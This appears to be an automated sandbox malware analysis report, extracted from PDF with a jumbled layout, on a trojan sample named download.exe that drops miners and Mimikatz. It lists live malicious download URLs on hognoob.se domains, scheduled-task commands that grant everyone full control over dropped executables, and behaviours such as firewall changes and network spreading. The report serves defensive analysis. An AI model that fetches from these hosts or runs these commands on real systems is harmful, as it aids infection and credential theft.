Automated Malware Analysis Report for download.exe

ID: 132586Sample Name: download.exeCookbook: default.jbsTime: 17:14:26Date: 16/05/2019Version: 26.0.0 Aquamarine

2555566778888999999

101010101011111111

1112121212121314141414141414151616161718181818192029292929323232

Table of Contents

Table of ContentsAnalysis Report download.exe

OverviewGeneral InformationDetectionConfidenceClassificationAnalysis AdviceMitre Att&ck MatrixSignature Overview

AV Detection:Exploits:Privilege Escalation:Bitcoin Miner:Spreading:Networking:Key, Mouse, Clipboard, Microphone and Screen Capturing:Spam, unwanted Advertisements and Ransom Demands:System Summary:Data Obfuscation:Persistence and Installation Behavior:Boot Survival:Hooking and other Techniques for Hiding and Protection:Malware Analysis System Evasion:Anti Debugging:HIPS / PFW / Operating System Protection Evasion:Language, Device and Operating System Detection:Lowering of HIPS / PFW / Operating System Security Settings:

Behavior GraphSimulations

Behavior and APIsAntivirus and Machine Learning Detection

Initial SampleDropped FilesUnpacked PE FilesDomainsURLs

Yara OverviewInitial SamplePCAP (Network Traffic)Dropped FilesMemory DumpsUnpacked PEs

Joe Sandbox View / ContextIPsDomainsASNJA3 FingerprintsDropped Files

ScreenshotsThumbnails

StartupCreated / dropped FilesDomains and IPs

Contacted DomainsContacted URLsURLs from Memory and BinariesContacted IPsPublicPrivate

Copyright Joe Security LLC 2019 Page 2 of 69

34343434343536363737

37373739414346464949495050505050515151

525253535353

535454

545454

54545555555555

565656

565657

5757

5757

575758

58585858

5959

606060

Static File InfoGeneralFile IconStatic PE Info

GeneralEntrypoint PreviewRich HeadersData DirectoriesSectionsImports

Network BehaviorNetwork Port DistributionTCP PacketsUDP PacketsDNS QueriesDNS AnswersHTTP Request Dependency GraphHTTP Packets

Code ManipulationsStatistics

BehaviorSystem Behavior

Analysis Process: download.exe PID: 3076 Parent PID: 3220GeneralFile Activities

File CreatedFile DeletedFile MovedFile Written

Analysis Process: qwr4rt.exe PID: 3308 Parent PID: 3076GeneralFile Activities

File CreatedFile MovedFile Written

Registry ActivitiesKey Value CreatedKey Value Modified

Analysis Process: ycemck.exe PID: 3268 Parent PID: 564GeneralFile Activities

Analysis Process: sqlisrv.exe PID: 4748 Parent PID: 3076GeneralFile Activities

File CreatedFile DeletedFile MovedFile Written

Analysis Process: cmd.exe PID: 1896 Parent PID: 4748GeneralFile Activities


Analysis Process: conhost.exe PID: 2560 Parent PID: 1896General


Analysis Process: PING.EXE PID: 2864 Parent PID: 1896GeneralFile Activities

Analysis Process: certutil.exe PID: 3304 Parent PID: 4080GeneralFile Activities

File Written

Analysis Process: b158ac7.exe PID: 5060 Parent PID: 1896General

Analysis Process: b158ac7.exe PID: 3356 Parent PID: 564GeneralFile Activities


606061

616161

6161

626262

62626262

63636363

63

6363

63636464

64

6464

6464

6465

6565

6565

6565

6666

6666

6666

6767

6767

6767

6768

6868

6868

6869

6969

6969

6969

File CreatedFile WrittenFile Read




Analysis Process: cacls.exe PID: 4728 Parent PID: 3968GeneralFile Activities

File Written

Analysis Process: netsh.exe PID: 4864 Parent PID: 3356GeneralFile Activities

File Written

Registry Activities


Analysis Process: netsh.exe PID: 1784 Parent PID: 3356GeneralFile Activities

File Written

Registry Activities


Analysis Process: cmd.exe PID: 2944 Parent PID: 3968General

Analysis Process: cacls.exe PID: 3632 Parent PID: 3968General


Analysis Process: cacls.exe PID: 1252 Parent PID: 3968General

Analysis Process: sqlisrv.exe PID: 652 Parent PID: 4080General



Analysis Process: GogoleUpadte.exe PID: 284 Parent PID: 4068General





Analysis Process: vfshost.exe PID: 4240 Parent PID: 1252General

Analysis Process: ouousbpro.exe PID: 2940 Parent PID: 1524General




DisassemblyCode Analysis


Create Interactive TourAnalysis Report download.exe

Overview

General Information

Joe Sandbox Version: 26.0.0 Aquamarine

Analysis ID: 132586

Start date: 16.05.2019

Start time: 17:14:26

Joe Sandbox Product: CloudBasic

Overall analysis duration: 0h 15m 12s

Hypervisor based Inspection enabled: false

Report type: light

Sample file name: download.exe

Cookbook file name: default.jbs

Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113

Number of analysed new started processes analysed: 41

Number of new started drivers analysed: 0

Number of existing processes analysed: 0

Number of existing drivers analysed: 0

Number of injected processes analysed: 0

Technologies: HCA enabledEGA enabledHDC enabled

Analysis stop reason: Timeout

Detection: MAL

Classification: mal100.troj.adwa.expl.evad.mine.winEXE@61/39@73/100

EGA Information: Successful, ratio: 85.7%

HDC Information: Successful, ratio: 12.7% (good quality ratio 11.9%)Quality average: 69.7%Quality standard deviation: 26.6%

HCA Information: Failed

Cookbook Comments: Adjust boot timeEnable AMSIFound application associated with file extension: .exe

Warnings:

Detection

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.TCP Packets have been reduced to 100Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, CompatTelRunner.exeExecution Graph export aborted for target b158ac7.exe, PID 3356 because it is emptyReport creation exceeded maximum time and may have missing disassembly code information.Report size exceeded maximum capacity and may have missing behavior information.Report size getting too big, too many NtAllocateVirtualMemory calls found.Report size getting too big, too many NtDeviceIoControlFile calls found.Report size getting too big, too many NtOpenKeyEx calls found.Report size getting too big, too many NtProtectVirtualMemory calls found.Report size getting too big, too many NtQueryValueKey calls found.Report size getting too big, too many NtReadVirtualMemory calls found.

Show All


Strategy Score Range Reporting Whitelisted Detection

Threshold 100 0 - 100 false

Confidence

Strategy Score Range Further Analysis Required? Confidence

Threshold 5 0 - 5 false

Classification


Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additionalcharacters like: "-", "/", "--")

Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior

Mitre Att&ck Matrix

Initial Access Execution PersistencePrivilegeEscalation Defense Evasion

CredentialAccess Discovery

LateralMovement Collection Exfiltration

Commandand Control

Valid Accounts Executionthrough API 1

File SystemPermissionsWeakness 1

File SystemPermissionsWeakness 1

Disabling SecurityTools 1

CredentialDumping 1

System TimeDiscovery 2

Remote FileCopy 1 2

InputCapture 1

DataEncrypted 1

UncommonlyUsed Port 2

ReplicationThroughRemovableMedia

ServiceExecution 2

Hooking 1 Hooking 1 SoftwarePacking 1 2 1

Hooking 1 Security SoftwareDiscovery 1 3 1

RemoteServices

Data fromRemovableMedia

ExfiltrationOver OtherNetworkMedium

CommonlyUsed Port 1

Ransomware

Spreading

Phishing

Banker

Trojan / Bot

Adware

Spyware

Exploiter

Evader

Miner

clean

clean

clean

clean

clean

clean

clean

suspicious

suspicious

suspicious

suspicious

suspicious

suspicious

suspicious

malicious

malicious

malicious

malicious

malicious

malicious

malicious


Drive-byCompromise

WindowsManagementInstrumentation

Modify ExistingService 3 1

ProcessInjection 1 1

Deobfuscate/DecodeFiles orInformation 1

InputCapture 1

File and DirectoryDiscovery 2

WindowsRemoteManagement

Data fromNetworkShared Drive

AutomatedExfiltration

Remote FileCopy 1 2

Exploit Public-FacingApplication

Scheduled Task NewService 2 3

NewService 2 3

File Deletion 1 Credentials inFiles

SystemInformationDiscovery 1 3

Logon Scripts Input Capture DataEncrypted

StandardCryptographicProtocol 1

SpearphishingLink

Command-LineInterface

ShortcutModification

File SystemPermissionsWeakness

Obfuscated Files orInformation 2 1

AccountManipulation

Query Registry 1 SharedWebroot

Data Staged ScheduledTransfer

StandardNon-ApplicationLayerProtocol 2

SpearphishingAttachment

Graphical UserInterface

Modify ExistingService

New Service Masquerading 1 3 Brute Force ProcessDiscovery 1

Third-partySoftware

ScreenCapture

Data TransferSize Limits

StandardApplicationLayerProtocol 2 2

Spearphishingvia Service

Scripting PathInterception

Scheduled Task ProcessInjection 1 1

Two-FactorAuthenticationInterception

ApplicationWindowDiscovery 1

Pass theHash

EmailCollection

ExfiltrationOverCommandand ControlChannel

UncommonlyUsed Port

Supply ChainCompromise

Third-partySoftware

Logon Scripts ProcessInjection

DLL Side-Loading 1

Bash History Remote SystemDiscovery 1 1

RemoteDesktopProtocol

ClipboardData

ExfiltrationOverAlternativeProtocol

StandardApplicationLayer Protocol

TrustedRelationship

Rundll32 DLL SearchOrder Hijacking

ServiceRegistryPermissionsWeakness

Indicator Removalon Host 1

Input Prompt System NetworkConfigurationDiscovery 2

WindowsAdmin Shares

AutomatedCollection

ExfiltrationOver PhysicalMedium

MultilayerEncryption

Initial Access Execution PersistencePrivilegeEscalation Defense Evasion

CredentialAccess Discovery

LateralMovement Collection Exfiltration

Commandand Control

Signature Overview

• AV Detection

• Exploits

• Privilege Escalation

• Bitcoin Miner

• Spreading

• Networking

• Key, Mouse, Clipboard, Microphone and Screen Capturing

• Spam, unwanted Advertisements and Ransom Demands

• System Summary

• Data Obfuscation

• Persistence and Installation Behavior

• Boot Survival

• Hooking and other Techniques for Hiding and Protection

• Malware Analysis System Evasion

• Anti Debugging

• HIPS / PFW / Operating System Protection Evasion

• Language, Device and Operating System Detection

• Lowering of HIPS / PFW / Operating System Security Settings

Click to jump to signature section

AV Detection:

Antivirus or Machine Learning detection for dropped file

Antivirus or Machine Learning detection for sample

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Antivirus or Machine Learning detection for unpacked file

Exploits:

Connects to many different private IPs (likely to spread or exploit)

Privilege Escalation:


Detected Hacktool Mimikatz

Bitcoin Miner:

Detected Stratum mining protocol

Found strings related to Crypto-Mining

Spreading:

Contains functionality to enumerate / list files inside a directory

Networking:

Connects to many ports of the same IP (likely port scanning)

Detected TCP or UDP traffic on non-standard ports

May check the online IP address of the machine

Uses known network protocols on non-standard ports

Uses ping.exe to check the status of other devices and networks

Connects to country known for bullet proof hosters

Downloads executable code via HTTP

IP address seen in connection with other malware

Uses a known web browser user agent for HTTP communication

Contains functionality to download additional files from the internet

Downloads files from webservers via HTTP

Performs DNS lookups

Urls found in memory or binary data

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)

Spam, unwanted Advertisements and Ransom Demands:

Modifies the hosts file

System Summary:

Uses a Windows Living Off The Land Binaries (LOL bins)

Contains functionality to call native functions

Contains functionality to delete services

Contains functionality to shutdown / reboot the system

Creates files inside the system directory

Creates mutexes

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Found potential string decryption / allocating functions

Reads the hosts file

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Yara signature match

PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)

Classification label

Contains functionality to create services

Contains functionality to load and extract PE file embedded resources


Contains functionality to modify services (start/stop/modify)

Contains functionality to register a service control handler (likely the sample is a service DLL)

Creates files inside the user directory

Creates temporary files

Reads ini files

Reads software policies

Sample is known by Antivirus

Sample might require command line arguments (.Net)

Spawns processes

Uses an in-process (OLE) Automation server

Found graphical window changes (likely an installer)

Binary contains paths to debug symbols

Data Obfuscation:

Contains functionality to dynamically determine API calls

File is packed with WinRar

PE file contains sections with non-standard names

Uses code obfuscation techniques (call, push, ret)

Sample is packed with UPX

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Boot Survival:

Creates or modifies windows services

Modifies existing windows services

Contains functionality to start windows services

Hooking and other Techniques for Hiding and Protection:

May modify the system service descriptor table (often done to hook functions)

Moves itself to temp directory

Uses known network protocols on non-standard ports

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to clear windows event logs (to hide its activities)

Uses cacls to modify the permissions of files

Disables application error messsages (SetErrorMode)

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications

Uses ping.exe to sleep

Contains functionality for execution timing, often used to detect debuggers

Found decision node followed by non-executed suspicious APIs

Found large amount of non-executed APIs

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to enumerate / list files inside a directory

Contains functionality to query system information


May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Program exit points

Queries a list of all running processes

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Enables debug privileges

Contains functionality to register its own exception handler

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)


Creates a process in suspended mode (likely to inject code)

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Contains functionality to query local / system time

Contains functionality to query time zone information

Contains functionality to query windows version

Queries the cryptographic machine GUID

Lowering of HIPS / PFW / Operating System Security Settings:


Uses netsh to modify the Windows network and firewall settings

Behavior Graph


Behavior Graph

ID: 132586

Sample: download.exe

Startdate: 16/05/2019

Architecture: WINDOWS

Score: 100

pxx.hognoob.se q1a.hognoob.se 2 other IPs or domains

Multi AV Scanner detectionfor domain / URL

Antivirus or MachineLearning detection for

dropped file


sample16 other signatures

download.exe

14

started

b158ac7.exe

2

started

ycemck.exe

started

fid.hognoob.se

C:\WebKitSdk\2.25.14\sqlisrv.exe, PE32

dropped

C:\WebKitSdk\2.25.14\qwr4rt.exe, PE32

dropped

Moves itself to tempdirectory

Contains functionalityto detect sleep reduction

/ modifications

sqlisrv.exe

4

started

cmd.exe

1

started

qwr4rt.exe

3 1

started

upa1.hognoob.se

172.104.161.101, 49809, 80

unknown

United States

upa2.hognoob.se

172.105.237.113, 49810, 80

unknown

United States

uio.hognoob.se

195.128.126.120, 49808, 63145

unknown

Russian Federation

C:\Windows\System32\drivers\etc\hosts, ASCII

dropped


cmd.exe

started

cmd.exe

1

started

cmd.exe

started

5 other processes

q1a.hognoob.se


dropped file

Multi AV Scanner detectionfor dropped file

C:\Windows\cc3d3243\b158ac7.exe, PE32

dropped


dropped file


cmd.exe

1

started

Drops executables tothe windows directory

(C:\Windows) andstarts them

Uses a Windows LivingOff The Land Binaries

(LOL bins)

certutil.exe

17

started

sqlisrv.exe

started

conhost.exe

started C:\Windows\SysWOW64\ycemck.exe, PE32

dropped

192.168.0.1, 6666

unknown

unknown

192.168.0.25, 6666

unknown

unknown

GogoleUpadte.exe

started

conhost.exe

started

7 other processes 2 other processes 3 other processes

127.0.0.1

unknown

unknown

Uses ping.exe to sleep

Drops executables tothe windows directory

(C:\Windows) andstarts them

b158ac7.exe

started

conhost.exe

started

PING.EXE

1

started

fid.hognoob.se

C:\Windows\Temp\sqlisrv.exe, PE32

dropped

C:\Users\user\AppData\...\sqlisrv[1].exe, PE32

dropped

C:\Users\...\C4E91F59715AA0FB54843EB617B4C0B5, PE32

dropped

System process connectsto network (likely due

to code injection orexploit)


dropped file


192.168.0.10, 6666

unknown

unknown

192.168.0.11, 6666

unknown

unknown

93 other IPs or domains

Connects to many differentprivate IPs (likely

to spread or exploit)

conhost.exe

started

vfshost.exe

started


dropped file


Legend:

Process

Signature

Created File

DNS/IP Info

Is Dropped

Is Windows Process

Number of created Registry Values

Number of created Files

Visual Basic

Delphi

Java

.Net C# or VB.NET

C, C++ or other language

Is malicious

Internet

Hide Legend

Time Type Description

17:15:36 API Interceptor 3x Sleep call for process: download.exe modified

17:15:41 API Interceptor 49x Sleep call for process: ycemck.exe modified

17:15:45 API Interceptor 1x Sleep call for process: certutil.exe modified

17:17:36 API Interceptor 47x Sleep call for process: b158ac7.exe modified

17:17:39 Task Scheduler Run new task: 355252544 path: cmd s>/c echo Y|cacls C:\Windows\TEMP\80244f85e\c54183.exe /p everyone:F

17:18:00 Task Scheduler Run new task: 93293e638 path: cmd s>/c C:\Windows\ime\b158ac7.exe

17:19:00 Task Scheduler Run new task: d95544aa8 path: cmd s>/c echo Y|cacls C:\Windows\cc3d3243\b158ac7.exe /p everyone:F

Source Detection Scanner Label Link

download.exe 68% virustotal Browse

download.exe 100% Avira HEUR/AGEN.1011827

download.exe 100% Joe Sandbox ML


C:\Windows\Temp\sqlisrv.exe 100% Avira HEUR/AGEN.1014767

Simulations

Behavior and APIs

Antivirus and Machine Learning Detection

Initial Sample

Dropped Files


https://www.virustotal.com/file/364faa9f9bec15ad226a2b4a03869ec42ad5aa7f2d6c99c65690d4b1de48a0dc/analysis/1557754567/

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\sqlisrv[1].exe 100% Avira HEUR/AGEN.1014767

C:\WebKitSdk\2.25.14\sqlisrv.exe 100% Avira HEUR/AGEN.1014767

C:\Windows\SysWOW64\ycemck.exe 100% Avira TR/BAS.ServStart.xxjtz

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C4E91F59715AA0FB54843EB617B4C0B5

100% Avira HEUR/AGEN.1014767

C:\Windows\cc3d3243\b158ac7.exe 100% Avira HEUR/AGEN.1014767

C:\WebKitSdk\2.25.14\qwr4rt.exe 100% Avira TR/BAS.ServStart.xxjtz

C:\Windows\Temp\sqlisrv.exe 100% Joe Sandbox ML

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\sqlisrv[1].exe 100% Joe Sandbox ML

C:\WebKitSdk\2.25.14\sqlisrv.exe 100% Joe Sandbox ML


100% Joe Sandbox ML

C:\Windows\cc3d3243\b158ac7.exe 100% Joe Sandbox ML


74% virustotal Browse

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\sqlisrv[1].exe 74% virustotal Browse

C:\WebKitSdk\2.25.14\qwr4rt.exe 79% virustotal Browse

C:\WebKitSdk\2.25.14\sqlisrv.exe 74% virustotal Browse

C:\Windows\SysWOW64\ycemck.exe 79% virustotal Browse

C:\Windows\Temp\sqlisrv.exe 74% virustotal Browse

C:\Windows\cc3d3243\b158ac7.exe 74% virustotal Browse


Source Detection Scanner Label Link Download

11.0.b158ac7.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File

36.0.vfshost.exe.7ff607270000.0.unpack 100% Avira HEUR/AGEN.1013725 Download File

4.2.sqlisrv.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File

2.2.qwr4rt.exe.400000.0.unpack 100% Avira HEUR/AGEN.1007501 Download File

2.0.qwr4rt.exe.400000.0.unpack 100% Avira TR/BAS.ServStart.xxjtz Download File


0.0.download.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File


3.2.ycemck.exe.400000.0.unpack 100% Avira HEUR/AGEN.1007501 Download File





3.1.ycemck.exe.400000.0.unpack 100% Avira HEUR/AGEN.1007501 Download File

3.0.ycemck.exe.400000.0.unpack 100% Avira TR/BAS.ServStart.xxjtz Download File




2.1.qwr4rt.exe.400000.0.unpack 100% Avira HEUR/AGEN.1007501 Download File



11.0.b158ac7.exe.400000.0.unpack 100% Joe Sandbox ML Download File

4.2.sqlisrv.exe.400000.0.unpack 100% Joe Sandbox ML Download File

2.2.qwr4rt.exe.400000.0.unpack 100% Joe Sandbox ML Download File


0.0.download.exe.400000.0.unpack 100% Joe Sandbox ML Download File



3.2.ycemck.exe.400000.0.unpack 100% Joe Sandbox ML Download File





3.1.ycemck.exe.400000.0.unpack 100% Joe Sandbox ML Download File




2.1.qwr4rt.exe.400000.0.unpack 100% Joe Sandbox ML Download File



Unpacked PE Files


https://www.virustotal.com/file/33f1d4d720d031615f5db0462702e1b1dee991fcfffe5c17d7e3e1060dc95fa7/analysis/1558013400/


https://www.virustotal.com/file/51e880f62a34cf8c49b343eff2f94f75fb8060edea4f3b29e2230dc120d4d38f/analysis/1557095720/






haq.hognoob.se 6% virustotal Browse


fid.hognoob.se/sqlisrv.exeC: 0% Avira URL Cloud safe

uio.hognoob.se:63145/cfg.inihttp://uio.heroherohero.info:63145/cfg.inihognoob 0% Avira URL Cloud safe

fid.hognoob.se/sqlisrv.exe 19% virustotal Browse

fid.hognoob.se/sqlisrv.exe 0% Avira URL Cloud safe

truehttp://fid.hognoob.se/download.exeoffpxi.hognoob.se:35791pxx.hognoob.se:357891.updateIME 0% Avira URL Cloud safe

u2. 0% Avira URL Cloud safe

fid.hognoob.se/download.exeC: 0% Avira URL Cloud safe

fid.hognoob.se/download.execmd.exe 0% Avira URL Cloud safe

No yara matches

No yara matches

Source Rule Description Author

C:\Windows\5c2a55da8\Corporate\log.txt Mimikatz_Logfile Detects a log file generated by malicious hack tool mimikatz

Florian Roth


00000024.00000002.6192286869.00007FF607342000.00000040.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)

00000024.00000002.6190697970.00007FF607271000.00000040.sdmp Powerkatz_DLL_Generic Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible)

Florian Roth

00000000.00000002.5123455439.0000000000767000.00000004.sdmp Certutil_Decode_OR_Download

Certutil Decode Florian Roth



00000004.00000001.5091079042.000000000058C000.00000080.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)

00000004.00000001.5091079042.000000000058C000.00000080.sdmp hacktool_windows_mimikatz_errors

Mimikatz credential dump tool: Error messages

@fusionrace

00000004.00000001.5091079042.000000000058C000.00000080.sdmp hacktool_windows_mimikatz_sekurlsa

Mimikatz credential dump tool @fusionrace

00000024.00000001.6149235365.00007FF607342000.00000080.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)



0000000B.00000001.5183737893.000000000058C000.00000080.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)

0000000B.00000001.5183737893.000000000058C000.00000080.sdmp hacktool_windows_mimikatz_errors


@fusionrace

0000000B.00000001.5183737893.000000000058C000.00000080.sdmp hacktool_windows_mimikatz_sekurlsa


00000024.00000001.6146216390.00007FF607301000.00000080.sdmp Powerkatz_DLL_Generic Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible)

Florian Roth

0000001B.00000001.5573571405.000000000058C000.00000080.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps


https://www.virustotal.com/url/e5730ccf134936b07735216d898646897dc95c63f1aa5164bc175617945a21dc/analysis/1558016543/

https://www.virustotal.com/url/77015ae533eb5427b157a278ddb011c5023750157820aa1d0cc97632ca2f4d02/analysis/1557883691/

0000001B.00000001.5573571405.000000000058C000.00000080.sdmp hacktool_windows_mimikatz_errors


@fusionrace

0000001B.00000001.5573571405.000000000058C000.00000080.sdmp hacktool_windows_mimikatz_sekurlsa


0000000B.00000002.5202663261.0000000000401000.00000040.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)

0000000B.00000002.5202663261.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_errors


@fusionrace

0000000B.00000002.5202663261.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_sekurlsa


00000004.00000002.5101425693.0000000000401000.00000040.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)

00000004.00000002.5101425693.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_errors


@fusionrace

00000004.00000002.5101425693.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_sekurlsa


0000000C.00000001.5206506082.0000000000401000.00000040.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)

0000000C.00000001.5206506082.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_errors


@fusionrace

0000000C.00000001.5206506082.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_sekurlsa


0000001B.00000002.5578674251.0000000000401000.00000040.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)

0000001B.00000002.5578674251.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_errors


@fusionrace

0000001B.00000002.5578674251.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_sekurlsa




36.1.vfshost.exe.7ff607270000.0.unpack Powerkatz_DLL_Generic Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible)

Florian Roth

36.1.vfshost.exe.7ff607270000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)

36.1.vfshost.exe.7ff607270000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth

36.1.vfshost.exe.7ff607270000.0.unpack Mimikatz_Gen_Strings Detects Mimikatz by using some special strings

Florian Roth

36.2.vfshost.exe.7ff607270000.0.unpack Powerkatz_DLL_Generic Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible)

Florian Roth

36.2.vfshost.exe.7ff607270000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)

36.2.vfshost.exe.7ff607270000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth

36.2.vfshost.exe.7ff607270000.0.unpack Mimikatz_Gen_Strings Detects Mimikatz by using some special strings

Florian Roth

12.2.b158ac7.exe.400000.0.unpack Ping_Command_in_EXE Detects an suspicious ping command execution in an executable

Florian Roth

27.1.sqlisrv.exe.400000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)

27.1.sqlisrv.exe.400000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth

27.1.sqlisrv.exe.400000.0.unpack hacktool_windows_mimikatz_errors


@fusionrace

27.1.sqlisrv.exe.400000.0.unpack hacktool_windows_mimikatz_sekurlsa






@fusionrace



11.1.b158ac7.exe.400000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)

11.1.b158ac7.exe.400000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth

11.1.b158ac7.exe.400000.0.unpack hacktool_windows_mimikatz_errors


@fusionrace

11.1.b158ac7.exe.400000.0.unpack hacktool_windows_mimikatz_sekurlsa





Florian Roth

Unpacked PEs




@fusionrace





4.2.sqlisrv.exe.400000.0.unpack Ping_Command_in_EXE Detects an suspicious ping command execution in an executable

Florian Roth



@fusionrace





27.2.sqlisrv.exe.400000.0.unpack Ping_Command_in_EXE Detects an suspicious ping command execution in an executable

Florian Roth



@fusionrace






Florian Roth



@fusionrace




Match Associated Sample Name / URL SHA 256 Detection Link Context

195.128.126.120 fid.hognoob.se/download.exe Get hash malicious Browse uio.hognoob.se:63145/cfg.ini

fid.hognoob.se/download.exe Get hash malicious Browse uio.hognoob.se:63145/cfg.ini



download.exe Get hash malicious Browse uio.hognoob.se:63145/cfg.ini


upa2.hognoob.se fid.hognoob.se/download.exe Get hash malicious Browse 195.128.127.237

fid.hognoob.se/download.exe Get hash malicious Browse 195.128.127.237



download.exe Get hash malicious Browse 139.162.71.92

q1a.hognoob.se fid.hognoob.se/download.exe Get hash malicious Browse 195.128.124.140

Joe Sandbox View / Context

IPs

Domains


https://view.joesandbox.com/analysis/110191/html/none?idtype=webid#static

https://view.joesandbox.com/analysis/110191/html/none





























2019.ip138.com fid.hognoob.se/download.exe Get hash malicious Browse 117.25.157.119


unloadcur.exe Get hash malicious Browse 125.77.198.152

unloadcur.exe Get hash malicious Browse 125.77.198.152




upa1.hognoob.se fid.hognoob.se/download.exe Get hash malicious Browse 195.128.127.237







unknown request.doc Get hash malicious Browse 192.168.0.44

FERK444259.doc Get hash malicious Browse 192.168.0.44

b392e93a5753601db564e6f2dc6a945aac3861bc31e2c1e5e7f3cd4e5bb150a4.js

Get hash malicious Browse 192.168.0.40

Setup.exe Get hash malicious Browse 192.168.0.40

base64.pdf Get hash malicious Browse 192.168.0.40

file.pdf Get hash malicious Browse 192.168.0.40

Spread sheet 2.pdf Get hash malicious Browse 192.168.0.40

request_08.30.doc Get hash malicious Browse 192.168.0.44

P_2038402.xlsx Get hash malicious Browse 192.168.0.44

48b1cf747a678641566cd1778777ca72.apk Get hash malicious Browse 192.168.0.22

seu nome na lista de favorecidos.exe Get hash malicious Browse 192.168.0.40

Adm_Boleto.via2.com Get hash malicious Browse 192.168.0.40

QuitacaoVotorantim345309.exe Get hash malicious Browse 192.168.0.40

pptxb.pdf Get hash malicious Browse 192.168.0.40

unknown request.doc Get hash malicious Browse 192.168.0.44

FERK444259.doc Get hash malicious Browse 192.168.0.44

b392e93a5753601db564e6f2dc6a945aac3861bc31e2c1e5e7f3cd4e5bb150a4.js

Get hash malicious Browse 192.168.0.40

Setup.exe Get hash malicious Browse 192.168.0.40

base64.pdf Get hash malicious Browse 192.168.0.40

file.pdf Get hash malicious Browse 192.168.0.40

Spread sheet 2.pdf Get hash malicious Browse 192.168.0.40

request_08.30.doc Get hash malicious Browse 192.168.0.44

P_2038402.xlsx Get hash malicious Browse 192.168.0.44

48b1cf747a678641566cd1778777ca72.apk Get hash malicious Browse 192.168.0.22

seu nome na lista de favorecidos.exe Get hash malicious Browse 192.168.0.40

Adm_Boleto.via2.com Get hash malicious Browse 192.168.0.40

QuitacaoVotorantim345309.exe Get hash malicious Browse 192.168.0.40

pptxb.pdf Get hash malicious Browse 192.168.0.40

ASN


































































































No context


C:\Windows\SysWOW64\ycemck.exe fid.hognoob.se/download.exe Get hash malicious Browse

fid.hognoob.se/download.exe Get hash malicious Browse




download.exe Get hash malicious Browse




C:\WebKitSdk\2.25.14\qwr4rt.exe fid.hognoob.se/download.exe Get hash malicious Browse









ThumbnailsThis section contains all screenshots as thumbnails, including those not shown in the slideshow.

JA3 Fingerprints

Dropped Files

Screenshots






































Startup


System is w10x64

download.exe (PID: 3076 cmdline: 'C:\Users\user\Desktop\download.exe' MD5: 31E46700743FAA4304532B36311E1177)

qwr4rt.exe (PID: 3308 cmdline: C:\WebKitSdk\2.25.14\qwr4rt.exe MD5: EABDC54C61088B769E9AF917AA6B05A4)

sqlisrv.exe (PID: 4748 cmdline: C:\WebKitSdk\2.25.14\sqlisrv.exe MD5: 1328C9CC50BD324399B4A83CA043BE6E)

